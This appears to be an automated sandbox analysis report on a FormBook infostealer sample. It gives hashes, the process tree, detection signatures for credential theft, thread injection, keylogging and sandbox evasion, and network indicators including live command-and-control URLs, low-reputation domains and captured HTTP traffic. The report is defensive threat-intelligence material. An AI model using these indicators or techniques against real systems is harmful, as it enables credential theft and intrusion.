Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
qbSIgCrCgw.exe

Overview

General Information

Sample name:qbSIgCrCgw.exe
renamed because original name is a hash value
Original sample name:bb04679008a1ac6bcd8ca7ff7470e0ee72450562fd87be1e0b8111f0e7ef2d76.exe
Analysis ID:1589092
MD5:8057aaa332a2045b3acb5040bad45772
SHA1:224c921be20a4e4c3b627f0dc01bd5c896ca122b
SHA256:bb04679008a1ac6bcd8ca7ff7470e0ee72450562fd87be1e0b8111f0e7ef2d76
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • qbSIgCrCgw.exe (PID: 2340 cmdline: "C:\Users\user\Desktop\qbSIgCrCgw.exe" MD5: 8057AAA332A2045B3ACB5040BAD45772)
    • svchost.exe (PID: 2916 cmdline: "C:\Users\user\Desktop\qbSIgCrCgw.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • WafZCahkNS.exe (PID: 2232 cmdline: "C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • mobsync.exe (PID: 7060 cmdline: "C:\Windows\SysWOW64\mobsync.exe" MD5: F7114D05B442F103BD2D3E20E78A7AA5)
          • WafZCahkNS.exe (PID: 3920 cmdline: "C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4520 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.3900807992.0000000002280000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.3898728526.0000000002A30000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.1668607265.00000000033A0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000006.00000002.3898911867.0000000002CE0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000002.00000002.1668177200.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\qbSIgCrCgw.exe", CommandLine: "C:\Users\user\Desktop\qbSIgCrCgw.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\qbSIgCrCgw.exe", ParentImage: C:\Users\user\Desktop\qbSIgCrCgw.exe, ParentProcessId: 2340, ParentProcessName: qbSIgCrCgw.exe, ProcessCommandLine: "C:\Users\user\Desktop\qbSIgCrCgw.exe", ProcessId: 2916, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\qbSIgCrCgw.exe", CommandLine: "C:\Users\user\Desktop\qbSIgCrCgw.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\qbSIgCrCgw.exe", ParentImage: C:\Users\user\Desktop\qbSIgCrCgw.exe, ParentProcessId: 2340, ParentProcessName: qbSIgCrCgw.exe, ProcessCommandLine: "C:\Users\user\Desktop\qbSIgCrCgw.exe", ProcessId: 2916, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T09:27:38.335404+010028563181A Network Trojan was detected192.168.2.849714103.224.182.24280TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://www.aballanet.cat/6xrr/?DzLTc=HxJAUmNG5a+243k7lB56qNhkSq7m2edDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBQY2hj09WsNhqz7jh3pjJtHZ6ivVVWaE+CFUoLu/IsL675g==&m8=urJ0WtmP0FPTTBAvira URL Cloud: Label: malware
                Source: http://www.aballanet.cat/6xrr/Avira URL Cloud: Label: malware
                Source: http://aballanet.cat/6xrr/?DzLTc=HxJAUmNG5aAvira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: qbSIgCrCgw.exeReversingLabs: Detection: 75%
                Source: qbSIgCrCgw.exeVirustotal: Detection: 68%Perma Link
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.3900807992.0000000002280000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3898728526.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1668607265.00000000033A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3898911867.0000000002CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1668177200.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3899007570.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1669021668.0000000005A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3900792299.0000000004940000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: qbSIgCrCgw.exeJoe Sandbox ML: detected
                Source: qbSIgCrCgw.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: mobsync.pdbGCTL source: svchost.exe, 00000002.00000003.1637196101.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1637295915.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1637317162.0000000002E31000.00000004.00000020.00020000.00000000.sdmp, WafZCahkNS.exe, 00000004.00000002.3899623920.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: WafZCahkNS.exe, 00000004.00000000.1588467968.000000000042E000.00000002.00000001.01000000.00000005.sdmp, WafZCahkNS.exe, 00000008.00000002.3899225250.000000000042E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: qbSIgCrCgw.exe, 00000000.00000003.1442854618.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, qbSIgCrCgw.exe, 00000000.00000003.1439827599.0000000003610000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1569421603.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1668648304.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1571730038.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1668648304.0000000003500000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000006.00000002.3900326799.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000006.00000002.3900326799.0000000004BAE000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000006.00000003.1675481440.0000000004864000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000006.00000003.1673465215.00000000046BE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: qbSIgCrCgw.exe, 00000000.00000003.1442854618.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, qbSIgCrCgw.exe, 00000000.00000003.1439827599.0000000003610000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1569421603.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1668648304.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1571730038.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1668648304.0000000003500000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, mobsync.exe, 00000006.00000002.3900326799.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000006.00000002.3900326799.0000000004BAE000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000006.00000003.1675481440.0000000004864000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000006.00000003.1673465215.00000000046BE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mobsync.pdb source: svchost.exe, 00000002.00000003.1637196101.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1637295915.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1637317162.0000000002E31000.00000004.00000020.00020000.00000000.sdmp, WafZCahkNS.exe, 00000004.00000002.3899623920.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: mobsync.exe, 00000006.00000002.3901773244.000000000503C000.00000004.10000000.00040000.00000000.sdmp, mobsync.exe, 00000006.00000002.3899096271.0000000002E29000.00000004.00000020.00020000.00000000.sdmp, WafZCahkNS.exe, 00000008.00000002.3901668653.000000000283C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1965350475.00000000007EC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: mobsync.exe, 00000006.00000002.3901773244.000000000503C000.00000004.10000000.00040000.00000000.sdmp, mobsync.exe, 00000006.00000002.3899096271.0000000002E29000.00000004.00000020.00020000.00000000.sdmp, WafZCahkNS.exe, 00000008.00000002.3901668653.000000000283C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1965350475.00000000007EC000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003F6CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_003F6CA9
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003F60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_003F60DD
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003F63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_003F63F9
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003FEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_003FEB60
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003FF56F FindFirstFileW,FindClose,0_2_003FF56F
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003FF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_003FF5FA
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_00401B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00401B2F
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_00401C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00401C8A
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_00401F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00401F94
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_02A4C560 FindFirstFileW,FindNextFileW,FindClose,6_2_02A4C560
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 4x nop then xor eax, eax6_2_02A39D90
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 4x nop then mov ebx, 00000004h6_2_048604EE

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.8:49714 -> 103.224.182.242:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.izmirescortg.xyz
                Source: DNS query: www.logidant.xyz
                Source: DNS query: www.tals.xyz
                Source: unknownNetwork traffic detected: IP country count 10
                Source: Joe Sandbox ViewIP Address: 45.141.156.114 45.141.156.114
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_00404EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00404EB5
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Sat, 11 Jan 2025 08:27:38 GMTserver: Apacheset-cookie: __tad=1736584058.5003721; expires=Tue, 09-Jan-2035 08:27:38 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 36 2b b8 09 36 6f 06 90 15 67 2b d6 c8 76 e6 4f 71 7e 99 79 0c 9b 8e e2 f9 3d c4 fd 54 d8 47 9d d1 4e 76 7a 44 14 5b 13 62 b1 cf f5 6a 84 e9 0e d5 a3 a5 fc d9 dd fc 78 fa 7f ed 8a 65 46 42 d4 7d 00 c6 ea 36 47 ef c7 8e ff fd 1d c6 ae be 1c 39 da f3 14 c3 b5 ab b9 d1 10 b1 6b ef 36 b6 5e 9e 9c 2f ce f5 c5 3b 38 00 a3 47 10 d3 a6 cb 30 a2 af d7 da 75 ce cb f4 a4 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 2d 8c 5c 99 d5 26 b0 fa fd 12 ac b3 b8 ca aa 52 41 eb b1 91 ff 9c df 38 09 17 59 f5 b1 33 fa 16 5a f4 38 0e aa 25 f4 a5 50 7c 71 38 3f 57 b1 6e 72 53 f6 48 9c 96 13 9e e1 af 8d d9 ca 94 2b 70 e7 db 14 78 80 88 89 32 5d ac e0 c7 e5 57 f9 5a d5 b7 f1 5e 3e 25 66 e7 d1 f2 d8 81 f8 57 78 00 84 56 5c 6f 1c 04 00 00 Data Ascii: TMo0=pvJQl;a*Z[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[*Z**kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS|lglvE)oNfg*9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P|q8?WnrSH+px2]WZ^>%fWxV\o
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Sat, 11 Jan 2025 08:27:40 GMTserver: Apacheset-cookie: __tad=1736584060.1234156; expires=Tue, 09-Jan-2035 08:27:40 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 36 2b b8 09 36 6f 06 90 15 67 2b d6 c8 76 e6 4f 71 7e 99 79 0c 9b 8e e2 f9 3d c4 fd 54 d8 47 9d d1 4e 76 7a 44 14 5b 13 62 b1 cf f5 6a 84 e9 0e d5 a3 a5 fc d9 dd fc 78 fa 7f ed 8a 65 46 42 d4 7d 00 c6 ea 36 47 ef c7 8e ff fd 1d c6 ae be 1c 39 da f3 14 c3 b5 ab b9 d1 10 b1 6b ef 36 b6 5e 9e 9c 2f ce f5 c5 3b 38 00 a3 47 10 d3 a6 cb 30 a2 af d7 da 75 ce cb f4 a4 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 2d 8c 5c 99 d5 26 b0 fa fd 12 ac b3 b8 ca aa 52 41 eb b1 91 ff 9c df 38 09 17 59 f5 b1 33 fa 16 5a f4 38 0e aa 25 f4 a5 50 7c 71 38 3f 57 b1 6e 72 53 f6 48 9c 96 13 9e e1 af 8d d9 ca 94 2b 70 e7 db 14 78 80 88 89 32 5d ac e0 c7 e5 57 f9 5a d5 b7 f1 5e 3e 25 66 e7 d1 f2 d8 81 f8 57 78 00 84 56 5c 6f 1c 04 00 00 Data Ascii: TMo0=pvJQl;a*Z[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[*Z**kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS|lglvE)oNfg*9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P|q8?WnrSH+px2]WZ^>%fWxV\o
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Sat, 11 Jan 2025 08:27:43 GMTserver: Apacheset-cookie: __tad=1736584063.7482204; expires=Tue, 09-Jan-2035 08:27:43 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 36 2b b8 09 36 6f 06 90 15 67 2b d6 c8 76 e6 4f 71 7e 99 79 0c 9b 8e e2 f9 3d c4 fd 54 d8 47 9d d1 4e 76 7a 44 14 5b 13 62 b1 cf f5 6a 84 e9 0e d5 a3 a5 fc d9 dd fc 78 fa 7f ed 8a 65 46 42 d4 7d 00 c6 ea 36 47 ef c7 8e ff fd 1d c6 ae be 1c 39 da f3 14 c3 b5 ab b9 d1 10 b1 6b ef 36 b6 5e 9e 9c 2f ce f5 c5 3b 38 00 a3 47 10 d3 a6 cb 30 a2 af d7 da 75 ce cb f4 a4 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 2d 8c 5c 99 d5 26 b0 fa fd 12 ac b3 b8 ca aa 52 41 eb b1 91 ff 9c df 38 09 17 59 f5 b1 33 fa 16 5a f4 38 0e aa 25 f4 a5 50 7c 71 38 3f 57 b1 6e 72 53 f6 48 9c 96 13 9e e1 af 8d d9 ca 94 2b 70 e7 db 14 78 80 88 89 32 5d ac e0 c7 e5 57 f9 5a d5 b7 f1 5e 3e 25 66 e7 d1 f2 d8 81 f8 57 78 00 84 56 5c 6f 1c 04 00 00 Data Ascii: TMo0=pvJQl;a*Z[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[*Z**kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS|lglvE)oNfg*9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P|q8?WnrSH+px2]WZ^>%fWxV\o
                Source: global trafficHTTP traffic detected: GET /lnl7/?m8=urJ0WtmP0FPTTB&DzLTc=kAPJ1zL1a1XedmcrdtHAbU+8MxIg1b6JbBGKYGigv+9peDDnEk+ogR7nF5sJltA40tggf7QxXQcZwaMcwHfgZUCCvIMy+6OdADZldWa3Ro5vmyUj0qJuSG5eCoJgas7XnA== HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.izmirescortg.xyzUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
